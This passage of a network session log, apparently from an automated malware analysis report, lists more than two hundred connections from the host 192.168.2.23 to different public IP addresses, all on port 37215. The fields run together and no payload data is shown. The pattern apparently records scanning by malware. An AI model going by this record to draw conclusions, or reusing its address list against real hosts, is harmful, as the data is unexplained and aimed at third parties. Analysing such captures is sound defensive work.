                                          9145192.168.2.2343204197.246.175.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9146192.168.2.2343300197.120.150.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9147192.168.2.2358916157.96.109.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9148192.168.2.233932441.170.35.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9149192.168.2.2342516197.124.76.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9150192.168.2.2351012197.65.142.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9151192.168.2.234606683.94.173.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9152192.168.2.2351878157.14.165.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9153192.168.2.234712841.173.221.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9154192.168.2.235144641.2.218.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9155192.168.2.2350136157.210.234.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9156192.168.2.2343916197.162.232.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9157192.168.2.233650841.50.146.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9158192.168.2.2346364197.33.65.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9159192.168.2.2359002197.85.243.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9160192.168.2.2344714157.77.245.16337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9161192.168.2.234110241.60.55.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9162192.168.2.2356922157.195.38.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9163192.168.2.2342800157.73.179.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9164192.168.2.234819241.48.123.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9165192.168.2.2348748157.44.146.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9166192.168.2.2342010157.168.27.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9167192.168.2.234508894.78.96.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9168192.168.2.234144041.194.35.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9169192.168.2.2346870157.85.100.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9170192.168.2.2342290197.179.122.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9171192.168.2.2353810157.125.163.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9172192.168.2.234060472.254.17.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9173192.168.2.233979441.222.165.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9174192.168.2.234647872.33.31.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9175192.168.2.2346262157.208.37.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9176192.168.2.233414059.41.238.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9177192.168.2.234486689.44.177.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9178192.168.2.234461034.184.189.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9179192.168.2.234228065.60.69.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9180192.168.2.2341656119.139.0.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9181192.168.2.235698241.100.40.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9182192.168.2.2357324165.220.180.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9183192.168.2.2354180219.220.139.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9184192.168.2.235163641.206.16.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9185192.168.2.2345658197.225.38.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9186192.168.2.2339202157.223.166.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9187192.168.2.2351060197.159.238.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9188192.168.2.2355682115.27.67.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9189192.168.2.2353164189.24.114.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9190192.168.2.2340504197.223.16.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9191192.168.2.2360108197.99.213.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9192192.168.2.235817041.112.53.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9193192.168.2.2353762189.182.171.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9194192.168.2.2360352148.83.177.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9195192.168.2.235081074.54.49.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9196192.168.2.2343860157.226.255.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9197192.168.2.234115641.15.127.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9198192.168.2.234296441.231.34.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9199192.168.2.2348580197.237.71.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9200192.168.2.2337952197.212.222.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9201192.168.2.233799641.106.87.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9202192.168.2.2353384157.87.201.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9203192.168.2.2359882157.37.38.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9204192.168.2.233312839.112.240.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9205192.168.2.235699641.184.238.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9206192.168.2.235347641.91.179.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9207192.168.2.2357914197.24.31.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9208192.168.2.2348716157.245.95.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9209192.168.2.2349992157.97.103.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9210192.168.2.2353318157.105.107.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9211192.168.2.2333378157.68.239.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9212192.168.2.2345654157.19.175.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9213192.168.2.2343044154.147.173.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9214192.168.2.235370046.33.27.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9215192.168.2.2337464197.95.107.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9216192.168.2.2351276157.240.60.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9217192.168.2.2341728197.116.186.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9218192.168.2.233599441.214.92.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9219192.168.2.2350320197.44.150.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9220192.168.2.235003641.49.112.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9221192.168.2.2352332157.214.235.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9222192.168.2.2340166197.32.217.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9223192.168.2.2355096157.197.147.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9224192.168.2.2350986157.170.22.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9225192.168.2.2340964157.181.223.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9226192.168.2.235226241.68.45.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9227192.168.2.2333402197.69.136.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9228192.168.2.235355618.210.162.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9229192.168.2.235538841.75.19.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9230192.168.2.2352802157.142.248.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9231192.168.2.2345852157.28.5.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9232192.168.2.2340410107.110.79.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9233192.168.2.234177841.90.101.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9234192.168.2.234343241.249.164.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9235192.168.2.234803274.133.11.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9236192.168.2.2336498157.176.69.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9237192.168.2.233990041.55.6.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9238192.168.2.2339824197.69.51.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9239192.168.2.2344684197.92.216.16937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9240192.168.2.2340762157.28.232.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9241192.168.2.235437486.212.120.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9242192.168.2.235087841.9.9.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9243192.168.2.2334042157.181.216.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9244192.168.2.2357388197.215.238.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9245192.168.2.233836841.209.55.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9246192.168.2.2334940197.39.127.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9247192.168.2.2345310197.46.169.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9248192.168.2.2334348145.126.143.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9249192.168.2.233298641.24.123.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9250192.168.2.235648224.183.84.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9251192.168.2.2354246157.59.161.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9252192.168.2.2336504157.127.183.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9253192.168.2.235573664.10.239.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9254192.168.2.2356260157.7.99.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9255192.168.2.2355780157.33.207.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9256192.168.2.2339526157.161.55.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9257192.168.2.2338654157.133.129.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9258192.168.2.2342948190.132.92.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9259192.168.2.2349908157.204.65.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9260192.168.2.234331282.0.143.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9261192.168.2.2356390157.248.187.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9262192.168.2.2356486124.183.105.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9263192.168.2.2358222157.119.102.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9264192.168.2.235040841.36.54.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9265192.168.2.2358948157.218.51.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9266192.168.2.233867418.40.38.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9267192.168.2.2358256206.146.156.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9268192.168.2.2357630157.225.169.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9269192.168.2.2357746197.104.144.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9270192.168.2.23437205.58.76.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9271192.168.2.235453841.51.47.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9272192.168.2.2342998195.107.156.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9273192.168.2.235929664.182.185.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9274192.168.2.235729641.55.182.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9275192.168.2.235713441.225.58.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9276192.168.2.2357044194.216.197.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9277192.168.2.2352508157.107.180.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9278192.168.2.233794841.203.132.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9279192.168.2.234188441.195.168.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9280192.168.2.2333980157.226.41.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9281192.168.2.234588241.130.165.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9282192.168.2.233947441.114.73.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9283192.168.2.233812627.207.222.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9284192.168.2.2352528157.29.111.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9285192.168.2.233675013.6.153.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9286192.168.2.2333528181.221.37.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9287192.168.2.2339324157.132.78.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9288192.168.2.235364841.67.99.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9289192.168.2.234795867.33.200.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9290192.168.2.2340708157.112.12.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9291192.168.2.2345114197.219.183.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9292192.168.2.2344854197.67.214.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9293192.168.2.2338996129.104.194.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9294192.168.2.2360686157.117.226.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9295192.168.2.234249270.26.118.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9296192.168.2.2352574197.80.155.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9297192.168.2.2349080197.168.99.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9298192.168.2.2342824197.149.129.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9299192.168.2.2359288114.145.222.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9300192.168.2.235547241.202.108.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9301192.168.2.2351620157.198.72.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9302192.168.2.2340252197.105.64.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9303192.168.2.2359356197.241.191.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9304192.168.2.2355356197.246.44.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9305192.168.2.2358600197.95.236.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9306192.168.2.233704441.170.112.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9307192.168.2.2334192197.47.206.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9308192.168.2.2346292108.94.180.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9309192.168.2.2335778159.138.84.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9310192.168.2.2357118178.20.33.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9311192.168.2.2339180157.207.164.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9312192.168.2.235669641.44.58.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9313192.168.2.2347222131.141.250.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9314192.168.2.2354914197.24.84.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9315192.168.2.2343828157.60.253.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9316192.168.2.233934441.196.52.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9317192.168.2.2351082157.54.80.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9318192.168.2.236082241.48.227.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9319192.168.2.2348486197.65.4.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9320192.168.2.2348302197.211.248.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9321192.168.2.2345002157.10.230.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9322192.168.2.233859041.17.153.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9323192.168.2.2360350157.26.170.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9324192.168.2.235919241.228.16.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9325192.168.2.2333790157.205.44.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9326192.168.2.2338216157.165.109.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9327192.168.2.2333358197.75.19.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9328192.168.2.2346634157.163.119.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9329192.168.2.2356596157.17.169.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9330192.168.2.2355550157.117.140.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9331192.168.2.2355738157.87.98.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9332192.168.2.2353512197.162.144.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9333192.168.2.2343124197.235.44.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9334192.168.2.2347462141.166.110.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9335192.168.2.2353038157.250.128.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9336192.168.2.2349526197.139.135.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9337192.168.2.235783241.22.47.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9338192.168.2.235851641.38.199.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9339192.168.2.2338208197.162.202.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9340192.168.2.2345180200.135.164.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9341192.168.2.2343152197.136.115.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9342192.168.2.2358156197.233.209.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9343192.168.2.2335516218.84.64.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9344192.168.2.2342526187.115.121.7937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9345192.168.2.233602892.162.54.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9346192.168.2.2353388197.100.255.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9347192.168.2.233574266.39.146.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9348192.168.2.235936019.107.107.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9349192.168.2.235777446.57.204.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9350192.168.2.2348178157.42.220.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9351192.168.2.2355504197.121.144.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9352192.168.2.23551148.75.113.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9353192.168.2.2356114197.51.130.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9354192.168.2.2358734157.168.142.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9355192.168.2.2345936157.58.85.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9356192.168.2.2342124197.85.73.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9357192.168.2.2345260125.137.135.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9358192.168.2.235135641.161.37.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9359192.168.2.2341534190.247.113.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9360192.168.2.233397841.228.46.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9361192.168.2.2352278197.185.250.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9362192.168.2.2351062157.166.157.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9363192.168.2.2340574157.117.66.6037215
                                          TimestampBytes transferredDirectionData


